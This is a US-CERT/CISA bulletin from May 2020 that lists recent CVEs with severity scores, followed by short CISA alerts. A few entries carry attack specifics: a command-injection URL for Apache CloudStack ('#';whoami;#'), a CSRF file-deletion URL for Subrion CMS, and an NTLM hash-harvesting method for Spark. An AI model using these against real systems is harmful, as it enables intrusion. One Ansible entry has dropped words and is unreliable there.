  Symantec IT Analytics, prior to 2.9.1, may be susceptible to a cross-site scripting (XSS) exploit, which is a type of issue that can potentially enable attackers to inject client-side scripts into web pages viewed by other users. 2020-05-13 3.5 CVE-2020-5838
MISC techsmith -- snagit
  In TechSmith SnagIt 11.2.1 through 20.0.3, an XML External Entity (XXE) injection issue exists that would allow a local attacker to exfiltrate data under the local Administrator account. 2020-05-08 2.1 CVE-2020-11541
CONFIRM typo3 -- typo3
  The SVG Sanitizer extension for TYPO3 has a cross-site scripting vulnerability in versions before 1.0.3. Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Albeit the markup is not valid it still is evaluated in browsers and leads to cross-site scripting. This is fixed in version 1.0.3. 2020-05-13 3.5 CVE-2020-11070
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.5.12 and less than 9.5.17, and greater than or equal to 10.2.0 and less than 10.4.2, it has been discovered that link tags generated by typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly. This has been fixed in 9.5.17 and 10.4.2. 2020-05-13 3.5 CVE-2020-11065
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, it has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2. 2020-05-13 3.5 CVE-2020-11064
CONFIRM Back to top

 

Severity Not Yet Assigned Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info 3s-smart_software_solutions -- codesys_development_system
  An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation. 2020-05-14 not yet calculated CVE-2020-12068
MISC
MISC apache -- ant
  Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process. 2020-05-14 not yet calculated CVE-2020-1945
MISC apache -- camel
  Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11972
MLIST
MLIST
MISC apache -- camel
  Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11973
MLIST
MISC apache -- camel
  Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 is affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11971
MLIST
MISC apache -- cloudstack
  A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. This applies to all versions prior to 4.13.1. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command. For example: Normal: http://{GW}:10086/baremetal/provisiondone/{mac}, Abnormal: http://{GW}:10086/baremetal/provisiondone/#';whoami;#. Mitigation of this issue is an upgrade to Apache CloudStack 4.13.1.0 or beyond. 2020-05-14 not yet calculated CVE-2019-17562
MISC apache -- flink
  A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data. 2020-05-14 not yet calculated CVE-2020-1960
MISC apache -- nuttx
  The Apache NuttX (Incubating) project provides an optional separate "apps" repository which contains various optional components and example programs. One of these, ftpd, had a NULL pointer dereference bug. The NuttX RTOS itself is not affected. Users of the optional apps repository are affected only if they have enabled ftpd. Versions 6.15 to 8.2 are affected. 2020-05-12 not yet calculated CVE-2020-1939
MISC apt -- apt
  Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files. 2020-05-15 not yet calculated CVE-2020-3810
MISC
MISC
MISC
MISC
MISC bitdefender -- bitdefender_engines
  Improper Input Validation vulnerability in the cevakrnl.rv0 module as used in the Bitdefender Engines allows an attacker to trigger a denial of service while scanning a specially-crafted sample. This issue affects: Bitdefender Bitdefender Engines versions prior to 7.84063. 2020-05-15 not yet calculated CVE-2020-8100
MISC canonical -- subiguity
  It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered. 2020-05-13 not yet calculated CVE-2020-11932
MISC cellebrite -- ufed
  Cellebrite UFED 5.0 to 7.5.0.845 implements local operating system policies that can be circumvented to obtain a command prompt via the Windows file dialog that is reachable via the Certificate-Based Authentication option of the Wireless Network Connection screen. 2020-05-15 not yet calculated CVE-2020-12798
MISC
MISC
MISC
MISC
MISC clamav -- clam_antivirus
  A vulnerability in the ARJ archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a heap buffer overflow read. An attacker could exploit this vulnerability by sending a crafted ARJ file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition. 2020-05-13 not yet calculated CVE-2020-3327
CISCO clamav -- clam_antivirus
  A vulnerability in the PDF archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.101 - 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a stack buffer overflow read. An attacker could exploit this vulnerability by sending a crafted PDF file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition. 2020-05-13 not yet calculated CVE-2020-3341
CISCO d-link -- dap-1360_devices
  An issue was discovered on D-Link DAP-1360 revision F devices. Remote attackers can start a telnet service without authorization via an undocumented HTTP request. Although this is the primary vulnerability, the impact depends on the firmware version. Versions 609EU through 613EUbeta were tested. Versions through 6.12b01 have weak root credentials, allowing an attacker to gain remote root access. After 6.12b01, the root credentials were changed but the telnet service can still be started without authorization. 2020-05-15 not yet calculated CVE-2019-18666
MISC
MISC
MISC eq-3 -- homematic_ccu2_and_ccu3_devices
  eQ-3 Homematic Central Control Unit (CCU)2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in the JSON API Method ReGa.runScript, by unauthenticated attackers with access to the web interface, due to the default auto-login feature being enabled during first-time setup (or factory reset). 2020-05-15 not yet calculated CVE-2020-12834
MISC estsoft -- alsong
  ALSong 3.46 and earlier version contain a Document Object Model (DOM) based cross-site scripting vulnerability caused by improper validation of user input. A remote attacker could exploit this vulnerability by tricking the victim to open ALSong Album(sab) file. 2020-05-15 not yet calculated CVE-2020-7809
MISC
MISC f5 -- nginx
  NGINX through 1.18.0 allows an HTTP request smuggling attack that can lead to cache poisoning, credential hijacking, or security bypass. 2020-05-14 not yet calculated CVE-2020-12440
MISC
MISC fazecast -- jserialcomm
  In Fazecast jSerialComm, Version 2.2.2 and prior, an uncontrolled search path element vulnerability could allow a malicious DLL file with the same name of any resident DLLs inside the software installation to execute arbitrary code. 2020-05-14 not yet calculated CVE-2020-10626
MISC freerdp -- freerdp
  libfreerdp/cache/bitmap.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out of bounds read. 2020-05-15 not yet calculated CVE-2020-11525
MISC
CONFIRM
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/codec/planar.c in FreeRDP version > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 not yet calculated CVE-2020-11521
MISC
CONFIRM
CONFIRM google -- android In mnld, an incorrect configuration in driver_cfg of mnld for meta factory mode.Product: AndroidVersions: Android SoCAndroid ID: A-149808700 2020-05-14 not yet calculated CVE-2020-0091
MISC google -- android
  An improper authorization in the receiver component of the Android Suite Daemon.Product: AndroidVersions: Android SoCAndroid ID: A-149813448 2020-05-14 not yet calculated CVE-2020-0065
MISC google -- android
  In setImageHeight and setImageWidth of ExifUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-148223871 2020-05-14 not yet calculated CVE-2020-0094
MISC google -- android
  An improper authorization while processing the provisioning data.Product: AndroidVersions: Android SoCAndroid ID: A-149866855 2020-05-14 not yet calculated CVE-2020-0064
MISC google -- android
  An improper authorization in the receiver component of Email.Product: AndroidVersions: Android SoCAndroid ID: A-149813048 2020-05-14 not yet calculated CVE-2020-0090
MISC google -- android
  In onCreate of SettingsBaseActivity.java, there is a possible unauthorized setting modification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-8.0Android ID: A-137015265 2020-05-14 not yet calculated CVE-2020-0024
MISC google -- android
  In various methods of PackageManagerService.java, there is a possible permission bypass due to a missing condition for system apps. This could lead to local escalation of privilege with User privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-145981139 2020-05-14 not yet calculated CVE-2020-0097
MISC google -- android
  In exif_data_save_data_entry of exif-data.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-148705132 2020-05-14 not yet calculated CVE-2020-0093
MLIST
MISC google -- android
  In onTransact of IHDCP.cpp, there is a possible out of bounds read due to incorrect error handling. This could lead to local information disclosure of data from a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-8.0Android ID: A-150156584 2020-05-14 not yet calculated CVE-2020-0100
MISC google -- android
  In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-145669109 2020-05-14 not yet calculated CVE-2020-0096
MISC google -- android
  In setHideSensitive of NotificationStackScrollLayout.java, there is a possible disclosure of sensitive notification content due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145135488 2020-05-14 not yet calculated CVE-2020-0092
MISC huawei -- multiple_devices
  Huawei smartphones Honor View 20;Honor 20;Honor 20 PRO;Honor Magic2 with Versions earlier than 10.0.0.179(C636E3R4P3),Versions earlier than 10.0.0.180(C185E3R3P3),Versions earlier than 10.0.0.180(C432E10R3P4),Versions earlier than 10.0.0.188(C00E62R2P11);Versions earlier than 10.0.0.187(C00E60R4P11);Versions earlier than 10.0.0.187(C00E60R4P11);Versions earlier than 10.0.0.176(C00E60R2P11) have an out of bound read vulnerability. The software reads data past the end of the intended buffer. The attacker tricks the user into installing a crafted application, successful exploit may cause information disclosure or service abnormal. 2020-05-15 not yet calculated CVE-2020-1808
MISC huawei -- p20_smartphones
  Huawei P20 smartphones with versions earlier than 10.0.0.156(C00E156R1P4) have an improper authentication vulnerability. The vulnerability is due to that when an user wants to do certain operation, the software insufficiently validate the user's identity. Attackers need to physically access the smartphone to exploit this vulnerability. Successful exploit could allow the attacker to bypass the limit of student mode function. 2020-05-15 not yet calculated CVE-2020-9073
MISC ignite_realtime -- spark
  An issue was discovered in Ignite Realtime Spark 2.8.3 (and the ROAR plugin for it) on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the (NT)LM hashes of the user are sent with the HTTP request. This allows an attacker to collect these hashes, crack them, and potentially compromise the computer. (ROAR can be configured for automatic access. Also, access can occur if the user clicks.) 2020-05-12 not yet calculated CVE-2020-12772
MISC intelliants -- subrion_cms
  A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion CMS 4.2.1 that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim. 2020-05-15 not yet calculated CVE-2019-20390
MISC intelliants -- subrion_cms
  An XSS issue was identified on the Subrion CMS 4.2.1 /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding. 2020-05-15 not yet calculated CVE-2019-20389
MISC interchange -- interchange
  XSS in the admin help system admin/help.html and admin/quicklinks.html in Interchange 4.7.0 through 5.11.x allows remote attackers to steal credentials or data via browser JavaScript. 2020-05-15 not yet calculated CVE-2020-12685
MISC
CONFIRM jal_information_technology -- pallet_control
  Improper Access Control in PALLET CONTROL Ver. 6.3 and earlier allows authenticated attackers to execute arbitrary code with the SYSTEM privilege on the computer where PALLET CONTROL is installed via unspecified vectors. PalletControl 7 to 9.1 are not affected by this vulnerability, however under the environment where PLS Management Add-on Module is used, all versions are affected. 2020-05-11 not yet calculated CVE-2020-5538
MISC
MISC jetstream -- jetselect
  The administrative passwords for all versions of Bond JetSelect are stored within an unprotected file on the filesystem, rather than encrypted within the MySQL database. This backup copy of the passwords is made as part of the installation script, after the administrator has generated a password using ENCtool.jar (see CVE-2019-13022). This allows any low-privilege user who can read this file to trivially obtain the passwords for the administrative accounts of the JetSelect application. The path to the file containing the encoded password hash is /opt/JetSelect/SFC/resources/sfc-general-properties. 2020-05-14 not yet calculated CVE-2019-13021
MISC jetstream -- jetselect
  Bond JetSelect (all versions) has an issue in the Java class (ENCtool.jar) and corresponding password generation algorithm (used to set initial passwords upon first installation). It XORs the plaintext into the 'encrypted' password that is then stored within the database. These steps are able to be trivially reversed, allowing for escalation of privilege within the JetSelect application through obtaining the passwords of JetSelect administrators. JetSelect administrators have the ability to modify and delete all networking configuration across a vessel, as well as altering network configuration of all managed network devices (switches, routers). 2020-05-14 not yet calculated CVE-2019-13022
MISC jetstream -- jetselect
  An issue was discovered in all versions of Bond JetSelect. Within the JetSelect Application, the web interface hides RADIUS secrets, WPA passwords, and SNMP strings from 'non administrative' users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible. 2020-05-14 not yet calculated CVE-2019-13023
MISC kerberos -- kerberos
  The kerberos package before 1.0.0 for Node.js allows arbitrary code execution and privilege escalation via injection of malicious DLLs through use of the kerberos_sspi LoadLibrary() method, because of a DLL path search. 2020-05-16 not yet calculated CVE-2020-13110
MISC
MISC
MISC
MISC linux -- linux_kernel
  The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space. 2020-05-15 not yet calculated CVE-2020-12888
MISC
MISC logkitty -- logkitty Lack of output sanitization allowed an attack to execute arbitrary shell commands via the logkitty npm package before version 0.7.1. 2020-05-15 not yet calculated CVE-2020-8149
MISC mikrotik -- mikrotik-router-monitoring-system
  An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community. 2020-05-16 not yet calculated CVE-2020-13118
MISC misp -- misp-maltego
  MISP MISP-maltego 1.4.4 incorrectly shares a MISP connection across users in a remote-transform use case. 2020-05-15 not yet calculated CVE-2020-12889
MISC mongodb -- mongodb
  In affected Ops Manager versions there is an exposed http route was that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5. 2020-05-13 not yet calculated CVE-2019-2388
MISC morita -- shogi
  Morita Shogi 64 through 2020-05-02 for Nintendo 64 devices allows remote attackers to execute arbitrary code via crafted packet data to the built-in modem because 0x800b3e94 (aka the IF subcommand to top-level command 7) has a stack-based buffer overflow. 2020-05-16 not yet calculated CVE-2020-13109
MISC
MISC naviserver -- naviserver
  NaviServer 4.99.4 to 4.99.19 allows denial of service due to the nsd/driver.c ChunkedDecode function not properly validating the length of a chunk. A remote attacker can craft a chunked-transfer request that will result in a negative value being passed to memmove via the size parameter, causing the process to crash. 2020-05-16 not yet calculated CVE-2020-13111
MISC
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC communication does not include any credentials. This allows an attacker with network access to directly communicate with SoftPAC, including, for example, stopping the service remotely. 2020-05-14 not yet calculated CVE-2020-10620
MISC palo_alto_networks -- global_protect_agent
  An open redirection vulnerability in the GlobalProtect component of Palo Alto Networks PAN-OS allows an attacker to specify an arbitrary redirection target away from the trusted GlobalProtect gateway. If the user then successfully authenticates it will cause them to access an unexpected and potentially malicious website. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.0 versions earlier than 8.0.14. 2020-05-13 not yet calculated CVE-2020-1997
CONFIRM palo_alto_networks -- pan-os
  A predictable temporary file vulnerability in PAN-OS allows a local authenticated user with shell access to corrupt arbitrary system files affecting the integrity of the system. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 not yet calculated CVE-2020-1994
CONFIRM palo_alto_networks -- pan-os
  A missing authorization vulnerability in the management server component of PAN-OS Panorama allows a remote unauthenticated user to inject messages into the management server ms.log file. This vulnerability can be leveraged to obfuscate an ongoing attack or fabricate log entries in the ms.log file This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.9. 2020-05-13 not yet calculated CVE-2020-1996
CONFIRM palo_alto_networks -- pan-os
  An improper authorization vulnerability in PAN-OS that mistakenly uses the permissions of local linux users instead of the intended SAML permissions of the account when the username is shared for the purposes of SSO authentication. This can result in authentication bypass and unintended resource access for the user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0. 2020-05-13 not yet calculated CVE-2020-1998
CONFIRM palo_alto_networks -- pan-os
  An authentication bypass by spoofing vulnerability exists in the authentication daemon and User-ID components of Palo Alto Networks PAN-OS by failing to verify the integrity of the Kerberos key distribution center (KDC) before authenticating users. This affects all forms of authentication that use a Kerberos authentication profile. A man-in-the-middle type of attacker with the ability to intercept communication between PAN-OS and KDC can login to PAN-OS as an administrator. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All version of PAN-OS 8.0. 2020-05-13 not yet calculated CVE-2020-2002
CONFIRM palo_alto_networks -- pan-os
  A cleartext transmission of sensitive information vulnerability in Palo Alto Networks PAN-OS Panorama that discloses an authenticated PAN-OS administrator's PAN-OS session cookie. When an administrator issues a context switch request into a managed firewall with an affected PAN-OS Panorama version, their PAN-OS session cookie is transmitted over cleartext to the firewall. An attacker with the ability to intercept this network traffic between the firewall and Panorama can access the administrator's account and further manipulate devices managed by Panorama. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All version of PAN-OS 8.0; 2020-05-13 not yet calculated CVE-2020-2013
CONFIRM pandas -- pandas
  pandas through 1.0.3 can unserialize and execute commands from an untrusted file that is passed to the read_pickle() function, if __reduce__ makes an os.system call. 2020-05-15 not yet calculated CVE-2020-13091
MISC progress -- moveit_automation_web_admin
  An issue was discovered in Progress MOVEit Automation Web Admin. A Web Admin application endpoint failed to adequately sanitize malicious input, which could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS. This affects 2018 - 2018.0 prior to 2018.0.3, 2018 SP1 - 2018.2 prior to 2018.2.3, 2018 SP2 - 2018.3 prior to 2018.3.7, 2019 - 2019.0 prior to 2019.0.3, 2019.1 - 2019.1 prior to 2019.1.2, and 2019.2 - 2019.2 prior to 2019.2.2. 2020-05-14 not yet calculated CVE-2020-12677
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM pulseaudio -- pulseaudio
  An Ubuntu-specific modification to Pulseaudio to provide security mediation for Snap-packaged applications was found to have a bypass of intended access restriction for snaps which plugs any of pulseaudio, audio-playback or audio-record via unloading the pulseaudio snap policy module. This issue affects: pulseaudio 1:8.0 versions prior to 1:8.0-0ubuntu3.12; 1:11.1 versions prior to 1:11.1-1ubuntu7.7; 1:13.0 versions prior to 1:13.0-1ubuntu1.2; 1:13.99.1 versions prior to 1:13.99.1-1ubuntu3.2; 2020-05-15 not yet calculated CVE-2020-11931
MISC red_hat -- ansible_engine
  An incomplete fix was found for the fix of the flaw CVE-2020-1733 ansible: insecure temporary directory when running become_user from become directive. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous versions are affected and Ansible Tower 3.4.5, 3.5.6 and 3.6.4 as well as previous versions are affected. 2020-05-15 not yet calculated CVE-2020-10744
CONFIRM red_hat -- ansible_engine
  A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble. 2020-05-11 not yet calculated CVE-2020-10685
CONFIRM
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack. 2020-05-15 not yet calculated CVE-2020-1758
CONFIRM
MISC sap -- business_client
  SAP Business Client, version 7.0, allows an attacker after a successful social engineering attack to inject malicious code as a DLL file in untrusted directories that can be executed by the application, due to uncontrolled search path element. An attacker could thereby control the behavior of the application. 2020-05-12 not yet calculated CVE-2020-6244
MISC
MISC scikit-learn -- scikit-learn
  scikit-learn (aka sklearn) through 0.23.0 can unserialize and execute commands from an untrusted file that is passed to the joblib.load() function, if __reduce__ makes an os.system call. 2020-05-15 not yet calculated CVE-2020-13092
MISC securecrt -- securecrt
  SecureCRT before 8.7.2 allows remote attackers to execute arbitrary code via an Integer Overflow and a Buffer Overflow because a banner can trigger a line number to CSI functions that exceeds INT_MAX. 2020-05-15 not yet calculated CVE-2020-12651
MISC
MISC
CONFIRM
MISC slpjs -- slpjs
  In SLP Validate (npm package slp-validate) before version 1.2.1, users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This has been fixed in slp-validate in version 1.2.1. Additonally, slpjs version 0.27.2 has a related fix under related CVE-2020-11071. 2020-05-12 not yet calculated CVE-2020-11072
MISC
CONFIRM slpjs -- slpjs
  SLPJS (npm package slpjs) before version 0.27.2, has a vulnerability where users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This is fixed in version 0.27.2. 2020-05-12 not yet calculated CVE-2020-11071
MISC
CONFIRM submitty -- submitty
  Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. 2020-05-15 not yet calculated CVE-2020-12882
MISC submitty -- sumbitty
  Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. 2020-05-16 not yet calculated CVE-2020-13121
MISC videolan -- vlc_media_player An off-by-one error in the DecodeBlock function in codec/sdl_image.c in VideoLAN VLC media player before 3.0.9 allows remote attackers to cause a denial of service (memory corruption) via a crafted image file. NOTE: this may be related to the SDL_Image product. 2020-05-15 not yet calculated CVE-2019-19721
MISC
MISC
MISC
MISC vmware -- spring_security
  Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack. 2020-05-14 not yet calculated CVE-2020-5408
CONFIRM wordpress -- wordpress
  The iubenda-cookie-law-solution plugin before 2.3.5 for WordPress does not restrict URL sanitization to http protocols. 2020-05-13 not yet calculated CVE-2020-12742
MISC
MISC xwiki -- platform
  In XWiki Platform 7.2 through 11.10.2, registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards. This has been fixed 11.3.7 , 11.10.3 and 12.0. 2020-05-12 not yet calculated CVE-2020-11057
CONFIRM
MISC
MISC yaws -- yaws
  yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks. 2020-05-15 not yet calculated CVE-2020-12872
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  USB DFU has a potential buffer overflow where the requested length (wLength) is not checked against the buffer size. This could be used by a malicious USB host to exploit the buffer overflow. See NCC-ZEP-002 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions. 2020-05-11 not yet calculated CVE-2020-10019
MISC
MISC
MISC
MISC
MISC zhejiang_dahua_technology -- multiple_devices
  Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method. 2020-05-13 not yet calculated CVE-2019-9682
MISC zhejiang_dahua_technology -- multiple_products
  Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device. 2020-05-13 not yet calculated CVE-2020-9502
MISC zhejiang_dahua_technology -- web_p2p
  Attackers can obtain Cloud Key information from the Dahua Web P2P control in specific ways. Cloud Key is used to authenticate the connection between the client tool and the platform. An attacker may use the leaked Cloud Key to impersonate the client to connect to the platform, resulting in additional consumption of platform server resources. Versions with Build time before April 2020 are affected. 2020-05-13 not yet calculated CVE-2020-9501
MISC zoho -- manageengine_servicedesk_plus
  Default installations of Zoho ManageEngine ServiceDesk Plus 10.0 before 10500 are vulnerable to XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute code on the Manage Engine ServiceDesk administrator side. At "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names in the Software column. In this field, a remote attacker can inject malicious code in order to execute it when the ManageEngine administrator visualizes this page. 2020-05-14 not yet calculated CVE-2019-15083
MISC
MISC
MISC
MISC Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

CISA-FBI Joint Announcement on PRC Targeting of COVID-19 Research Organizations

US-CERT All NCAS Products - Wed, 05/13/2020 - 14:12
Original release date: May 13, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have jointly released a Public Service Announcement on the People’s Republic of China’s targeting of COVID-19 research organizations. CISA and FBI encourage COVID-19 research organizations to review and apply the announcement’s recommended mitigations to prevent surreptitious review or theft of COVID-19-related material.  

For more information on Chinese malicious cyber activity, see https://www.us-cert.gov/china.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Microsoft Releases May 2020 Security Updates

US-CERT All NCAS Products - Tue, 05/12/2020 - 21:22
Original release date: May 12, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s May 2020 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Adobe Releases Security Updates

US-CERT All NCAS Products - Tue, 05/12/2020 - 17:04
Original release date: May 12, 2020

Adobe has released security updates to address vulnerabilities affecting Adobe DNG Software Development Kit, Acrobat, and Reader. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletin APSB20-24 and APSB20-26 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

MIFR-10121050-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:26
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary Description

